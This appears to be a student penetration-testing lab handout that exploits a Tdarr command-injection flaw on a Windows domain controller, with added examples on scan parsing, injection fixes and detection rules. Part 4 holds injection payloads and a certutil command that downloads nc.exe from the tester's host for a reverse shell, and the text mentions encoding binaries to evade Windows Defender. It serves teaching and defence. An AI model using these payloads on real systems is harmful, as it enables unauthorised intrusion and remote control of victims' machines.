Simulate a real-life penetration test

Reference no: EM133184211

Lab: Penetration Testing Lab

Introduction to the Lab
This is a penetration testing lab created to simulate a real-life penetration test on a Windows 2016 domain controller. This lab was customized specially for you using Detection Lab.
This lab is divided into 6 parts, and we will follow the penetration testing phases:
1. Planning
2. Reconnaissance and Information Gathering
3. Enumeration and scanning
4. Attack/gaining access and Exploitation
5. Persistence
6. Analysis and reporting

Requirements
- Kali Linux
- Install Nessus on Ubuntu, Windows or any OS of your choice (optional; earn a bonus of 2 marks for running a Nessus credentialed scan against the target)
- (optional) Show another way to get a reverse shell and earn an extra 2 marks bonus. We used netcat in this lab; show another way to earn the bonus (either this or Nessus for the bonus mark)
- The vulnerable windows machine provided by instructor

Phases of a Penetration Test

Part 1: Planning
Rules of engagement document - We already have the rules of engagement for the client; see below.
Scope of Work
The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test).
Additionally, the client has provided the following scope allowances:
- Any tools or techniques are permitted in this engagement; however, we ask that you attempt manual exploitation first
- Locate and note all vulnerabilities found
- Only the IP address assigned to your machine is in scope
- Rules of engagement completed
- Signing and Kickoff Call

Part 2: Reconnaissance and Information Gathering
1. Netdiscover - Netdiscover is a simple ARP scanner that can be used to find live hosts on a network
- Run netdiscover to discover all live hosts within our subnet
o Command: netdiscover -i eth0 (now we see all live IP addresses within the subnet)

Part 3: Enumeration and scanning
In this phase we begin by starting our scans. We start them first because a scan may take some time, depending on the target host and the vulnerabilities it has.
1. Run Nessus and Nmap
• Please note that Nessus is optional for this assignment

2. Nessus (optional)
• Nessus is a remote security scanning tool that scans a computer and reports any vulnerabilities it discovers
o Scan your target host

3. Nmap - Nmap discovers hosts and services on a computer network by sending packets and analyzing the responses
• Run an nmap scan against the target. Make sure to scan all ports.
o Command - nmap -sV -sC -p- TargetIP (-sV: service/version detection, -sC: default scripts, -p-: all 65535 TCP ports)

4. OSINT: We will do some open-source intelligence gathering to learn more about the discovered ports and services (wait: let's start our Nessus scan first, if you are doing the optional part, so it runs in the background)
• The web application we are researching is Tdarr
Tdarr is a popular conditional transcoding application for processing large (or small) media libraries, and the proof of concept for the exploitation was released on 10th of March 2022. I believe it is really cool to play with an exploit that was released just last week without a patch yet.
Let's do some more enumeration using a few more tools.
Nikto: Nikto is a free command-line vulnerability scanner that scans web servers for dangerous files/CGIs, outdated server software and other problems
• Command: nikto -h "URL or IP address"
o E.g. nikto -h https://192.168.80.212:8266

5. Dirbuster (dirb)
• dirb is a tool used to brute-force web directories and file names (URIs)
o Command: dirb https://IPAddress:port (sometimes the application just uses the default port, 80 or 443)
E.g. dirb https://192.168.80.218:8266
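The scan results from this phase end up in the Technical Details section of the report in Part 6, so it is worth saving them in a machine-readable form. As an added example (not part of the lab handout), here is a small Python script that turns a saved scan into a findings list and a report table. It assumes the nmap scan was also written in grepable format with -oG (nmap -sV -sC -p- -oG scan.gnmap TargetIP); the sample output embedded below is constructed, and its ports, service names and version strings are invented rather than taken from the lab target.

```python
"""Turning the lab's nmap scan into a findings list for the report.

Added example, not from the lab handout. Assumes the scan was also saved in
nmap's grepable format (`nmap -sV -sC -p- -oG scan.gnmap TargetIP`). The sample
output below is constructed; its ports, services and versions are invented.
"""
import re
from typing import Dict, List

# Constructed sample of a grepable nmap report: fields are tab-separated,
# port entries are comma-separated, sub-fields inside an entry are slash-separated.
SAMPLE_GNMAP = (
    "# Nmap 7.92 scan initiated as: nmap -sV -sC -p- -oG scan.gnmap 192.168.80.212\n"
    "Host: 192.168.80.212 ()\tStatus: Up\n"
    "Host: 192.168.80.212 ()\tPorts: 53/open/tcp//domain//Simple DNS Plus/, "
    "88/open/tcp//kerberos-sec//Microsoft Windows Kerberos/, "
    "445/open/tcp//microsoft-ds///, "
    "8266/open/tcp//http//Node.js Express framework/\tIgnored State: filtered (65531)\n"
    "# Nmap done -- 1 IP address (1 host up) scanned\n"
)

HOST_RE = re.compile(r"^Host: (\S+)")
PORT_FIELDS = ("port", "state", "proto", "owner", "service", "rpc", "version")


def parse_gnmap(text: str) -> List[Dict[str, str]]:
    """Return one record per port entry found in a grepable nmap report."""
    findings: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m or "Ports: " not in line:
            continue  # comment lines and status-only host lines carry no ports
        host = m.group(1)
        ports_field = line.split("Ports: ", 1)[1].split("\t", 1)[0]
        for entry in ports_field.split(", "):
            # Entry layout: port/state/protocol/owner/service/rpcinfo/version/
            # Trailing empty sub-fields (no version detected) vanish under rstrip,
            # so pad the list back to seven fields.
            parts = entry.rstrip("/").split("/", 6)
            parts += [""] * (len(PORT_FIELDS) - len(parts))
            record = dict(zip(PORT_FIELDS, parts))
            record["host"] = host
            findings.append(record)
    return findings


def open_ports(findings: List[Dict[str, str]]) -> List[int]:
    """Sorted list of ports nmap reported as open."""
    return sorted(int(f["port"]) for f in findings if f["state"] == "open")


def report_table(findings: List[Dict[str, str]]) -> str:
    """Markdown table for the Technical Details section of the report."""
    rows = ["| Host | Port | Proto | State | Service | Version |",
            "|---|---|---|---|---|---|"]
    for f in findings:
        rows.append(f"| {f['host']} | {f['port']} | {f['proto']} | {f['state']} "
                    f"| {f['service']} | {f['version']} |")
    return "\n".join(rows)


if __name__ == "__main__":
    found = parse_gnmap(SAMPLE_GNMAP)
    print("open ports:", open_ports(found))
    print(report_table(found))
```

Run it against your own scan.gnmap instead of SAMPLE_GNMAP and paste the table into the report next to the nmap screenshot; the version column is where the Tdarr web service on 8266 shows up as a candidate for the OSINT step.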

After the first three stages of our methodology, it's time to do some exploitation. Follow the demo from class to exploit the vulnerability, or follow the steps in Part 4.

Part 4: Attack/gaining access and Exploitation
Time to have some fun. Once the vulnerability has been detected during scanning and enumeration, we will use it to gather internal information about our victim. Information worth gaining at this point includes the internal IP address and the services running, which helps us exploit the target system further.
Just as we did in class, interact with the internal host through the vulnerable application using its vulnerability. Make sure to take screenshots; you will need them for your report.
Run the following commands through the vulnerable application:
• --help&&ipconfig
• --help&&whoami
• --help&&ping 8.8.8.8 (let's see if our host can ping the internet)
• --help&&ping "YourkaliIP" (Try if your victim can ping your kali IP address)
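The `--help&&...` pattern in the commands above is OS command injection: the application joins a user-controlled option onto a command line and hands it to a shell, so `&&` ends the intended command and starts another. Below is an added example, not Tdarr's code and not part of the lab handout, that models a hypothetical web handler doing exactly that, next to the two fixes a developer would apply (argument vector instead of a shell, plus an allow-list on the option). A Python one-liner stands in for the real command-line tool so the example runs anywhere; the real application's tool and parameter names are not assumed.

```python
"""Why `--help&&ipconfig` works: OS command injection through a shell.

Added example; this is not Tdarr's code and not part of the lab handout. It
models a hypothetical web handler that forwards a user-supplied option string to
a command-line tool. A small Python one-liner stands in for the real tool.
"""
import re
import shlex
import subprocess
import sys

# The stand-in "tool" prints its first argument, like a CLI echoing an option.
TOOL_ARGV = [sys.executable, "-c", "import sys; print(sys.argv[1])"]

# Allow-list for a CLI option: letters, digits and dashes only, nothing a shell parses.
SAFE_OPTION = re.compile(r"^--[a-z][a-z0-9-]*$")


def run_tool_vulnerable(option: str) -> str:
    """Builds one command line and hands it to /bin/sh (shell=True).

    The shell parses the string, so "--help&&<anything>" becomes two commands:
    the tool receives "--help" and a second, caller-chosen command runs after it.
    This is the defect class the lab exploits.
    """
    tool = " ".join(shlex.quote(a) for a in TOOL_ARGV)
    cmdline = tool + " " + option  # option deliberately unquoted: the bug
    return subprocess.run(cmdline, shell=True, capture_output=True, text=True).stdout


def run_tool_argv(option: str) -> str:
    """Fix 1: pass an argument vector and no shell; '&&' is just bytes in one argument."""
    return subprocess.run(TOOL_ARGV + [option], capture_output=True, text=True).stdout


def is_safe_option(option: str) -> bool:
    """Fix 2: positive validation of the option against the allow-list."""
    return SAFE_OPTION.fullmatch(option) is not None


def run_tool_hardened(option: str) -> str:
    """Defence in depth: validate first, then use the argv form."""
    if not is_safe_option(option):
        raise ValueError(f"rejected option: {option!r}")
    return run_tool_argv(option)


if __name__ == "__main__":
    payload = "--help&&echo INJECTED"   # harmless stand-in for the lab's payloads
    print("shell=True :", repr(run_tool_vulnerable(payload)))
    print("argv       :", repr(run_tool_argv(payload)))
    print("allow-list :", is_safe_option(payload))
```

In the shell=True version the second line of output comes from a command the handler never intended to run; in the argv version the whole string reaches the tool as one argument and nothing else executes. The allow-list is the layer that also blocks option-argument abuse that argv alone does not stop.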
The next step is to try to gain access to our target system through remote code execution.
In this demonstration we will use a tool called netcat. We will transfer netcat to our victim machine using another tool called certutil, which is already present on Windows
(we have to live off the land). Check out a great resource later for tools penetration testers use to live off the land: https://lolbas-project.github.io/
1. Netcat: Netcat, aka nc, is an extremely versatile tool. It allows users to connect to specific ports and send and receive data, and it also allows a machine to receive data and connections on specific ports, which makes nc a very popular tool for gaining access.
• Search for netcat on your Kali using the command: locate nc.exe
• Make a copy of netcat to your present directory using the command:
o cp /usr/share/path/path/nc.exe .
o E.g. cp /usr/share/windows-resources/binaries/nc.exe .

2. Python HTTP server: Host a Python HTTP server on your Kali Linux to send your nc.exe binary to the victim machine.
Note: we will send this to the Temp folder, as Windows Defender would block and delete it in a regular folder. Sometimes Windows Defender also blocks binaries dropped in the Temp folder; as penetration testers we can encode the binary using Base64 to get it past Windows Defender, but that is beyond the scope of this class.

• Command to host the HTTP server: python -m http.server 80
• Note: run your HTTP server from the same folder your netcat was copied into, and leave it running while you open another command-line tab in your Kali VM
Now that we are hosting our HTTP server, we can run a command on our victim to download nc.exe into the victim's Temp folder.
3. Certutil: This is a Windows binary used for handling certificates; we will use it to transfer files in this lab
• Command to transfer a file (run this command on the vulnerable web application)

• --help&&certutil.exe -f -split -urlcache http://YourKaliIP/nc.exe C:\Windows\Temp\nc.exe
e.g. --help&&certutil.exe -f -split -urlcache http://192.168.80.182/nc.exe C:\Windows\Temp\nc.exe
Note: the URL uses plain http:// because python -m http.server serves HTTP, not HTTPS. Make sure your HTTP server is running in the folder where your nc.exe is saved; if it is not running, or is running from a different folder, the download will fail.
You should get a success message after running this command (make sure to take a screenshot of the success; you will need it for your report)
4. Transfer confirmation: Confirm your nc.exe was sent to the victim machine using the following command, which lists the files in the Temp folder
• --help&&dir C:\windows\Temp\
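From the defender's side, the transfer step above leaves two strong signals in process-creation telemetry: certutil.exe invoked with -urlcache and a URL (a classic LOLBAS download), and a binary executing out of C:\Windows\Temp. Below is an added example, not part of the lab handout, of detection logic run over constructed, simplified process-creation records. The key=value line format, the timestamps and the benign events are invented for the example; real Windows Security 4688 or Sysmon Event ID 1 data would need its own parser, but the rules carry over unchanged.

```python
"""Detecting the lab's file-transfer and staging steps on the target host.

Added example, not from the lab handout. The events below are constructed in a
simplified key=value form that mimics the fields of a Windows process-creation
event (image path, parent image, command line).
"""
import re
from typing import Callable, Dict, List, Tuple

# Constructed sample events: two from the lab's own steps, two benign look-alikes.
SAMPLE_EVENTS = [
    r"ts=2022-03-17T10:01:02Z image=C:\Windows\System32\certutil.exe "
    r"parent=C:\Windows\System32\cmd.exe "
    r"cmdline=certutil.exe -f -split -urlcache http://192.168.80.182/nc.exe C:\Windows\Temp\nc.exe",
    r"ts=2022-03-17T10:01:40Z image=C:\Windows\Temp\nc.exe "
    r"parent=C:\Windows\System32\cmd.exe cmdline=nc.exe",
    r"ts=2022-03-17T10:02:00Z image=C:\Windows\System32\certutil.exe "
    r"parent=C:\Windows\explorer.exe cmdline=certutil.exe -verify server.cer",
    r"ts=2022-03-17T10:02:10Z image=C:\Windows\System32\ipconfig.exe "
    r"parent=C:\Windows\System32\cmd.exe cmdline=ipconfig",
]

# key=value pairs; a value runs until the next " key=" or the end of the line.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")


def parse_event(line: str) -> Dict[str, str]:
    """Turn one constructed log line into a field dictionary."""
    return dict(FIELD_RE.findall(line))


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


# Each rule: (name, predicate over the parsed event).
RULES: List[Tuple[str, Callable[[Dict[str, str]], bool]]] = [
    # certutil fetching a URL into the local cache: file download via a signed
    # Windows binary (see the LOLBAS project page for certutil).
    ("certutil_urlcache_download",
     lambda e: _basename(e.get("image", "")) == "certutil.exe"
               and "-urlcache" in e.get("cmdline", "").lower()
               and "http" in e.get("cmdline", "").lower()),
    # Anything executing from a Temp directory: staging location used by the lab.
    ("execution_from_temp",
     lambda e: "\\temp\\" in e.get("image", "").lower()),
    # Known netcat binary names, regardless of location or arguments.
    ("netcat_binary",
     lambda e: _basename(e.get("image", "")) in {"nc.exe", "nc64.exe", "ncat.exe"}),
]


def detect(lines: List[str]) -> List[Dict[str, object]]:
    """Run every rule over every event; return one alert per event that matches."""
    alerts: List[Dict[str, object]] = []
    for idx, line in enumerate(lines):
        ev = parse_event(line)
        hits = [name for name, pred in RULES if pred(ev)]
        if hits:
            alerts.append({"index": idx, "ts": ev.get("ts"),
                           "image": ev.get("image"), "rules": hits})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"{alert['ts']}  {alert['image']}  ->  {', '.join(alert['rules'])}")
```

The benign certutil -verify call and the ipconfig run produce no alert, which is the point of matching on the -urlcache switch plus a URL rather than on certutil.exe alone; on the target this lab uses, a credentialed Nessus scan or the domain controller's own audit log would be the realistic source of these events.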
5. Remote code execution: Remote Code Execution (RCE), also known as Arbitrary Code Execution, describes a form of cyberattack in which the attacker can run commands of their own choosing on another person's computing device.

6. Reverse shell
A reverse shell is a type of shell in which the target machine initiates the connection back to the attacking machine. The attacking machine runs a listener on a port, receives the connection, and through it obtains code or command execution on the target.

Part 5: Persistence
Remember, we do not need to maintain persistence because we are not attackers; we are ethical hackers/penetration testers. We just want to show our client that we were able to breach their network and provide adequate evidence that this occurred.

Part 6: Analysis and Reporting
Create a detailed report showing the steps you took in this penetration test, using the template provided by the instructor.
Your report should have the following sections:
o Table of Contents
o Purpose
o Scope
o Executive Summary (remember, executive summaries are for executives, so make sure this section is non-technical)
o Technical details (this includes all your findings with screenshots, for example screenshots of your nmap scan results, Nikto results, proof of exploit on the vulnerable machine, etc.)
o Your report should include at least 20 screenshots of your methodology
o See the sample reports provided by the instructor on DC Connect for guidance

Attachment:- Penetration_Testing_Lab.rar


All rights reserved! Copyrights ©2019-2020 ExpertsMind IT Educational Pvt Ltd